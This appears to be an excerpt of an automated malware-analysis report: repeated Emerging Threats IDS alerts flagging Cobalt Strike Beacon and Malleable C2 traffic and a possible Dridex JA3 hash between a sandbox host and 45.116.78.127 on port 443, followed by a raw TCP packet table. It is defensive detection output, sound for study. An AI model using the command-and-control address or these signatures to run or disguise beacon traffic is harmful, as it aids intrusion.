                                2025-01-02T10:34:27.236320+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54976645.116.78.127443TCP
                                2025-01-02T10:34:27.937620+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54976645.116.78.127443TCP
                                2025-01-02T10:34:27.937620+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54976645.116.78.127443TCP
                                2025-01-02T10:34:27.938313+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549766TCP
                                2025-01-02T10:34:29.151741+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54978245.116.78.127443TCP
                                2025-01-02T10:34:29.816572+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54978245.116.78.127443TCP
                                2025-01-02T10:34:29.816572+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54978245.116.78.127443TCP
                                2025-01-02T10:34:29.816835+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549782TCP
                                2025-01-02T10:34:31.044480+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54979445.116.78.127443TCP
                                2025-01-02T10:34:31.706974+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54979445.116.78.127443TCP
                                2025-01-02T10:34:31.706974+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54979445.116.78.127443TCP
                                2025-01-02T10:34:31.707424+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549794TCP
                                2025-01-02T10:34:32.900275+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54980945.116.78.127443TCP
                                2025-01-02T10:34:33.555179+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54980945.116.78.127443TCP
                                2025-01-02T10:34:33.555179+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54980945.116.78.127443TCP
                                2025-01-02T10:34:33.555591+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549809TCP
                                2025-01-02T10:34:34.809395+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54982245.116.78.127443TCP
                                2025-01-02T10:34:35.465882+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54982245.116.78.127443TCP
                                2025-01-02T10:34:35.465882+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54982245.116.78.127443TCP
                                2025-01-02T10:34:35.466219+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549822TCP
                                2025-01-02T10:34:36.675522+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54983645.116.78.127443TCP
                                2025-01-02T10:34:37.338965+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54983645.116.78.127443TCP
                                2025-01-02T10:34:37.338965+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54983645.116.78.127443TCP
                                2025-01-02T10:34:37.345373+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549836TCP
                                2025-01-02T10:34:38.585436+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54984945.116.78.127443TCP
                                2025-01-02T10:34:39.287641+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54984945.116.78.127443TCP
                                2025-01-02T10:34:39.287641+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54984945.116.78.127443TCP
                                2025-01-02T10:34:39.289599+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549849TCP
                                2025-01-02T10:34:40.544573+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54986345.116.78.127443TCP
                                2025-01-02T10:34:41.211719+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54986345.116.78.127443TCP
                                2025-01-02T10:34:41.211719+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54986345.116.78.127443TCP
                                2025-01-02T10:34:41.212082+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549863TCP
                                2025-01-02T10:34:42.434575+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54987845.116.78.127443TCP
                                2025-01-02T10:34:43.153663+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54987845.116.78.127443TCP
                                2025-01-02T10:34:43.153663+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54987845.116.78.127443TCP
                                2025-01-02T10:34:43.153994+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549878TCP
                                2025-01-02T10:34:44.430146+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54989045.116.78.127443TCP
                                2025-01-02T10:34:45.134788+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54989045.116.78.127443TCP
                                2025-01-02T10:34:45.134788+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54989045.116.78.127443TCP
                                2025-01-02T10:34:45.135478+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549890TCP
                                2025-01-02T10:34:46.361190+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54990645.116.78.127443TCP
                                2025-01-02T10:34:47.129666+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54990645.116.78.127443TCP
                                2025-01-02T10:34:47.129666+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54990645.116.78.127443TCP
                                2025-01-02T10:34:47.135266+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549906TCP
                                2025-01-02T10:34:48.315748+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54991845.116.78.127443TCP
                                2025-01-02T10:34:48.979834+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54991845.116.78.127443TCP
                                2025-01-02T10:34:48.979834+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54991845.116.78.127443TCP
                                2025-01-02T10:34:48.988027+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549918TCP
                                2025-01-02T10:34:50.274161+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54993345.116.78.127443TCP
                                2025-01-02T10:34:50.944422+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54993345.116.78.127443TCP
                                2025-01-02T10:34:50.944422+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54993345.116.78.127443TCP
                                2025-01-02T10:34:50.944662+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549933TCP
                                2025-01-02T10:34:52.701561+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54994545.116.78.127443TCP
                                2025-01-02T10:34:53.351892+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54994545.116.78.127443TCP
                                2025-01-02T10:34:53.351892+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54994545.116.78.127443TCP
                                2025-01-02T10:34:53.352483+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549945TCP
                                2025-01-02T10:34:54.643270+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54996245.116.78.127443TCP
                                2025-01-02T10:34:55.316109+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54996245.116.78.127443TCP
                                2025-01-02T10:34:55.316109+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54996245.116.78.127443TCP
                                2025-01-02T10:34:55.317666+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549962TCP
                                2025-01-02T10:34:56.589408+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54997845.116.78.127443TCP
                                2025-01-02T10:34:57.256975+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54997845.116.78.127443TCP
                                2025-01-02T10:34:57.256975+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54997845.116.78.127443TCP
                                2025-01-02T10:34:57.258298+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549978TCP
                                2025-01-02T10:34:58.519753+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54998945.116.78.127443TCP
                                2025-01-02T10:34:59.189687+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.54998945.116.78.127443TCP
                                2025-01-02T10:34:59.189687+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.54998945.116.78.127443TCP
                                2025-01-02T10:34:59.190054+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.549989TCP
                                2025-01-02T10:35:00.428509+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000345.116.78.127443TCP
                                2025-01-02T10:35:01.105692+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000345.116.78.127443TCP
                                2025-01-02T10:35:01.105692+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000345.116.78.127443TCP
                                2025-01-02T10:35:01.106608+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550003TCP
                                2025-01-02T10:35:02.397660+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000445.116.78.127443TCP
                                2025-01-02T10:35:03.061089+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000445.116.78.127443TCP
                                2025-01-02T10:35:03.061089+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000445.116.78.127443TCP
                                2025-01-02T10:35:03.065114+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550004TCP
                                2025-01-02T10:35:04.283634+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000545.116.78.127443TCP
                                2025-01-02T10:35:04.954043+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000545.116.78.127443TCP
                                2025-01-02T10:35:04.954043+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000545.116.78.127443TCP
                                2025-01-02T10:35:04.954891+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550005TCP
                                2025-01-02T10:35:06.243736+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000645.116.78.127443TCP
                                2025-01-02T10:35:06.909697+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000645.116.78.127443TCP
                                2025-01-02T10:35:06.909697+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000645.116.78.127443TCP
                                2025-01-02T10:35:06.910071+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550006TCP
                                2025-01-02T10:35:08.085295+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000745.116.78.127443TCP
                                2025-01-02T10:35:08.737331+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000745.116.78.127443TCP
                                2025-01-02T10:35:08.737331+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000745.116.78.127443TCP
                                2025-01-02T10:35:08.737598+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550007TCP
                                2025-01-02T10:35:09.896562+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000845.116.78.127443TCP
                                2025-01-02T10:35:10.420539+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000845.116.78.127443TCP
                                2025-01-02T10:35:10.420539+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000845.116.78.127443TCP
                                2025-01-02T10:35:10.428495+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550008TCP
                                2025-01-02T10:35:11.765317+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55000945.116.78.127443TCP
                                2025-01-02T10:35:12.243598+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55000945.116.78.127443TCP
                                2025-01-02T10:35:12.243598+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55000945.116.78.127443TCP
                                2025-01-02T10:35:12.244025+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550009TCP
                                2025-01-02T10:35:13.334887+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001045.116.78.127443TCP
                                2025-01-02T10:35:13.863025+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001045.116.78.127443TCP
                                2025-01-02T10:35:13.863025+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001045.116.78.127443TCP
                                2025-01-02T10:35:13.868644+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550010TCP
                                2025-01-02T10:35:15.081504+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001145.116.78.127443TCP
                                2025-01-02T10:35:15.776542+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001145.116.78.127443TCP
                                2025-01-02T10:35:15.776542+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001145.116.78.127443TCP
                                2025-01-02T10:35:15.776816+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550011TCP
                                2025-01-02T10:35:17.044023+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001245.116.78.127443TCP
                                2025-01-02T10:35:17.712476+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001245.116.78.127443TCP
                                2025-01-02T10:35:17.712476+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001245.116.78.127443TCP
                                2025-01-02T10:35:17.712836+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550012TCP
                                2025-01-02T10:35:19.139603+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001345.116.78.127443TCP
                                2025-01-02T10:35:19.806754+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001345.116.78.127443TCP
                                2025-01-02T10:35:19.806754+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001345.116.78.127443TCP
                                2025-01-02T10:35:20.575136+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550013TCP
                                2025-01-02T10:35:21.913780+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001445.116.78.127443TCP
                                2025-01-02T10:35:22.587459+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001445.116.78.127443TCP
                                2025-01-02T10:35:22.587459+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001445.116.78.127443TCP
                                2025-01-02T10:35:22.601054+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550014TCP
                                2025-01-02T10:35:23.901675+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001545.116.78.127443TCP
                                2025-01-02T10:35:24.575099+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001545.116.78.127443TCP
                                2025-01-02T10:35:24.575099+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001545.116.78.127443TCP
                                2025-01-02T10:35:24.575376+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550015TCP
                                2025-01-02T10:35:25.816225+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001645.116.78.127443TCP
                                2025-01-02T10:35:26.483418+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001645.116.78.127443TCP
                                2025-01-02T10:35:26.483418+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001645.116.78.127443TCP
                                2025-01-02T10:35:26.490360+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550016TCP
                                2025-01-02T10:35:27.731440+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001745.116.78.127443TCP
                                2025-01-02T10:35:28.391452+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001745.116.78.127443TCP
                                2025-01-02T10:35:28.391452+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001745.116.78.127443TCP
                                2025-01-02T10:35:28.391743+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550017TCP
                                2025-01-02T10:35:29.605768+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001845.116.78.127443TCP
                                2025-01-02T10:35:30.273853+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001845.116.78.127443TCP
                                2025-01-02T10:35:30.273853+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001845.116.78.127443TCP
                                2025-01-02T10:35:30.280709+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550018TCP
                                2025-01-02T10:35:31.486285+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55001945.116.78.127443TCP
                                2025-01-02T10:35:33.002512+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55001945.116.78.127443TCP
                                2025-01-02T10:35:33.002512+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55001945.116.78.127443TCP
                                2025-01-02T10:35:33.002755+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550019TCP
                                2025-01-02T10:35:34.183638+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002045.116.78.127443TCP
                                2025-01-02T10:35:34.851482+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002045.116.78.127443TCP
                                2025-01-02T10:35:34.851482+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002045.116.78.127443TCP
                                2025-01-02T10:35:34.851723+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550020TCP
                                2025-01-02T10:35:36.097843+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002145.116.78.127443TCP
                                2025-01-02T10:35:36.795278+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002145.116.78.127443TCP
                                2025-01-02T10:35:36.795278+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002145.116.78.127443TCP
                                2025-01-02T10:35:36.800172+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550021TCP
                                2025-01-02T10:35:38.162854+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002245.116.78.127443TCP
                                2025-01-02T10:35:38.814912+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002245.116.78.127443TCP
                                2025-01-02T10:35:38.814912+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002245.116.78.127443TCP
                                2025-01-02T10:35:38.815252+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550022TCP
                                2025-01-02T10:35:39.937789+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002345.116.78.127443TCP
                                2025-01-02T10:35:40.639081+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002345.116.78.127443TCP
                                2025-01-02T10:35:40.639081+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002345.116.78.127443TCP
                                2025-01-02T10:35:40.639319+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550023TCP
                                2025-01-02T10:35:41.839749+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002445.116.78.127443TCP
                                2025-01-02T10:35:42.555830+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002445.116.78.127443TCP
                                2025-01-02T10:35:42.555830+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002445.116.78.127443TCP
                                2025-01-02T10:35:42.556071+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550024TCP
                                2025-01-02T10:35:43.792569+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002545.116.78.127443TCP
                                2025-01-02T10:35:44.443340+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002545.116.78.127443TCP
                                2025-01-02T10:35:44.443340+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002545.116.78.127443TCP
                                2025-01-02T10:35:44.443519+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550025TCP
                                2025-01-02T10:35:45.480638+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002645.116.78.127443TCP
                                2025-01-02T10:35:46.148932+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002645.116.78.127443TCP
                                2025-01-02T10:35:46.148932+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002645.116.78.127443TCP
                                2025-01-02T10:35:46.149196+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550026TCP
                                2025-01-02T10:35:47.399653+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002745.116.78.127443TCP
                                2025-01-02T10:35:48.093172+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002745.116.78.127443TCP
                                2025-01-02T10:35:48.093172+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002745.116.78.127443TCP
                                2025-01-02T10:35:48.093491+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550027TCP
                                2025-01-02T10:35:49.391791+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002845.116.78.127443TCP
                                2025-01-02T10:35:50.042937+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002845.116.78.127443TCP
                                2025-01-02T10:35:50.042937+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002845.116.78.127443TCP
                                2025-01-02T10:35:50.047585+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550028TCP
                                2025-01-02T10:35:51.318409+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55002945.116.78.127443TCP
                                2025-01-02T10:35:51.989380+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55002945.116.78.127443TCP
                                2025-01-02T10:35:51.989380+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55002945.116.78.127443TCP
                                2025-01-02T10:35:51.990056+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550029TCP
                                2025-01-02T10:35:53.183655+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55003045.116.78.127443TCP
                                2025-01-02T10:35:53.848224+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55003045.116.78.127443TCP
                                2025-01-02T10:35:53.848224+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55003045.116.78.127443TCP
                                2025-01-02T10:35:53.851213+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550030TCP
                                2025-01-02T10:35:55.109773+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55003145.116.78.127443TCP
                                2025-01-02T10:35:55.773488+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55003145.116.78.127443TCP
                                2025-01-02T10:35:55.773488+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55003145.116.78.127443TCP
                                2025-01-02T10:35:55.773742+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550031TCP
                                2025-01-02T10:35:57.023569+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55003245.116.78.127443TCP
                                2025-01-02T10:35:57.685330+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55003245.116.78.127443TCP
                                2025-01-02T10:35:57.685330+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55003245.116.78.127443TCP
                                2025-01-02T10:35:57.685613+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550032TCP
                                2025-01-02T10:35:58.954272+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55003345.116.78.127443TCP
                                2025-01-02T10:35:59.670152+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55003345.116.78.127443TCP
                                2025-01-02T10:35:59.670152+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55003345.116.78.127443TCP
                                2025-01-02T10:35:59.670445+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550033TCP
                                2025-01-02T10:36:00.904156+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.55003445.116.78.127443TCP
                                2025-01-02T10:36:01.621895+01002033658ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M21192.168.2.55003445.116.78.127443TCP
                                2025-01-02T10:36:01.621895+01002033928ET MALWARE Cobalt Strike Beacon Activity (GET)1192.168.2.55003445.116.78.127443TCP
                                2025-01-02T10:36:01.622123+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response145.116.78.127443192.168.2.550034TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 2, 2025 10:33:59.235516071 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:33:59.235572100 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:33:59.235662937 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:33:59.243611097 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:33:59.243626118 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:00.428268909 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:00.428364992 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:34:00.492456913 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:34:00.492491961 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:00.492841005 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:00.492891073 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:34:00.494878054 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:34:00.539341927 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:01.092730045 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:01.092802048 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:01.092804909 CET49704443192.168.2.545.116.78.127
                                Jan 2, 2025 10:34:01.092834949 CET4434970445.116.78.127192.168.2.5
                                Jan 2, 2025 10:34:01.092852116 CET49704443192.168.2.545.116.78.127
